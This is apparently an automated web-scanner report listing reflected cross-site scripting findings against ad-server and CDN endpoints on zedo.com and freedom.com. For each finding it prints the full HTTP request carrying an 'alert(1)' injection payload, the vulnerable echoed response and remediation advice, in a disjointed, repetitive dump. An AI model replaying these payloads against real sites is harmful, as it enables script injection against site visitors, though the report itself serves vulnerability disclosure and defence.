FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=132 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:52 GMT Connection: close Content-Length: 2521
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='ed98c";alert(1)//2c617412c80';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=ed98c";alert(1)//2c617412c80;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44fa'%3balert(1)//438e80c48dc was submitted in the q parameter. This input was echoed as f44fa';alert(1)//438e80c48dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=f44fa'%3balert(1)//438e80c48dc&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=132 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:52 GMT Connection: close Content-Length: 2521
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='f44fa';alert(1)//438e80c48dc';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=f44fa';alert(1)//438e80c48dc;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38718"%3balert(1)//62cf392d211 was submitted in the $ parameter. This input was echoed as 38718";alert(1)//62cf392d211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=38718"%3balert(1)//62cf392d211&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:38718";alert(1)//62cf392d211;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=125 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:59 GMT Connection: close Content-Length: 2512
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',38718";alert(1)//62cf392d211';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,38718";alert(1)//62cf392d211;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aa1'%3balert(1)//71dd49f8f74 was submitted in the $ parameter. This input was echoed as 98aa1';alert(1)//71dd49f8f74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=98aa1'%3balert(1)//71dd49f8f74&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:98aa1';alert(1)//71dd49f8f74;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=125 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:59 GMT Connection: close Content-Length: 2512
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',98aa1';alert(1)//71dd49f8f74';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,98aa1';alert(1)//71dd49f8f74;z="+Math.random();}
1.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c7.zedo.com
Path:
/bar/v16-401/c5/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce34c'-alert(1)-'2c607e7cd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?ce34c'-alert(1)-'2c607e7cd20=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 986 Content-Type: application/x-javascript Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=403 Expires: Thu, 03 Feb 2011 16:18:54 GMT Date: Thu, 03 Feb 2011 16:12:11 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb1'%3balert(1)//8a1d92bd133 was submitted in the q parameter. This input was echoed as c7cb1';alert(1)//8a1d92bd133 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=c7cb1'%3balert(1)//8a1d92bd133&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=126 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:58 GMT Connection: close Content-Length: 2509
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='c7cb1';alert(1)//8a1d92bd133';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=c7cb1';alert(1)//8a1d92bd133;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2059a"%3balert(1)//3c744e65e36 was submitted in the q parameter. This input was echoed as 2059a";alert(1)//3c744e65e36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=2059a"%3balert(1)//3c744e65e36&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=126 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:58 GMT Connection: close Content-Length: 2509
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='2059a";alert(1)//3c744e65e36';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=2059a";alert(1)//3c744e65e36;z="+Math.random();}
The value of the CMP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87dce'%3balert(1)//cd49a21da3a was submitted in the CMP parameter. This input was echoed as 87dce';alert(1)//cd49a21da3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 8d4ab<script>alert(1)</script>26bbc880e6b was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister HTTP/1.1 Host: common.cdn.onset.freedom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:04:46 GMT Server: Apache Last-Modified: Thu, 03 Feb 2011 19:04:46 GMT ETag: "3e96ae5b9a43fcda3ef515d03304a9d6-80952" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 19:04:46 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/css Content-Length: 80952
/* Reset styles for browser compatibility */ body, th, td, p, div { font-family:Arial, Helvetica, sans-serif; } html,ul,ol,li,h1,h2,h3 ...[SNIP]...
1.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.cdn.onset.freedom.com
Path:
/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c071b<script>alert(1)</script>68b91996e9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 HTTP/1.1 Host: common.cdn.onset.freedom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:04:50 GMT Server: Apache Last-Modified: Thu, 03 Feb 2011 19:04:50 GMT ETag: "c833a993b4a7a934d84484ad93124520-86888" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 19:04:50 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/css Content-Length: 86888
The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 8d317<script>alert(1)</script>6d5518f0373 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 HTTP/1.1 Host: common.cdn.onset.freedom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:04:47 GMT Server: Apache Last-Modified: Thu, 03 Feb 2011 19:04:49 GMT ETag: "63029f1bf18ce33fe44a9bdae196c917-22441" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 19:04:47 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/css Content-Length: 22441
/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 */ /*generic freedom site styles, take layout.css styles and define fonts, background images, etc */
/* define page areas */ body { font-family: Arial, Helvetica, sans-serif; font-size: 100%; ...[SNIP]...
The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1014d"%3balert(1)//21a83927387 was submitted in the ctype parameter. This input was echoed as 1014d";alert(1)//21a83927387 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
